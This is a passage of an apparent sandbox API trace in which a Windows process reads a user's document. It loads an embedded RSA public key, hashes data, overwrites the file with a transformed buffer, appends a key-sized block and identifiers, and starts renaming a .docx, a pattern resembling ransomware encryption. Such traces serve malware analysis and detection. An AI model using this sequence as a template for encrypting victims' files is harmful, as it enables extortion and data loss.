lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.682] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.682] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x16e3e, lpOverlapped=0x0) returned 1 [0196.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.684] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.684] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.684] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0196.685] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.685] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.685] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.685] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.685] GetLastError () returned 0x0 [0196.685] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.685] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0196.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.686] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.686] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.686] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16e40) returned 0x2af5168 [0196.687] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea410 [0196.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6638 [0196.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea458 [0196.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6650 [0196.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6680 [0196.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66e0 [0196.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6698 [0196.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.688] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0196.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66e0 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6698 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6680 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0196.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0196.691] GetCurrentThreadId () returned 0x5d8 [0196.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0196.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af21e0 [0196.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0196.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0196.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.692] GetCurrentThreadId () returned 0x5d8 [0196.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0196.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66e0 [0196.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6680 [0196.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0196.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6698 [0196.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6668 [0196.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66f8 [0196.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0196.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66c8 [0196.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66b0 [0196.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6710 [0196.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66b0 [0196.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0196.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0196.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6680 [0196.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0196.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0196.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea458 | out: hHeap=0x2c0000) returned 1 [0196.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0196.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0196.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.703] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x16e39, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x16e39, lpOverlapped=0x0) returned 1 [0196.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.704] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16e3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.704] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0196.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0196.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0196.706] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.706] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.706] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.706] CloseHandle (hObject=0x584) returned 1 [0196.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0196.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0196.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0196.708] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\v_uiD 9U5nghF.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\v_uid 9u5nghf.docx"), 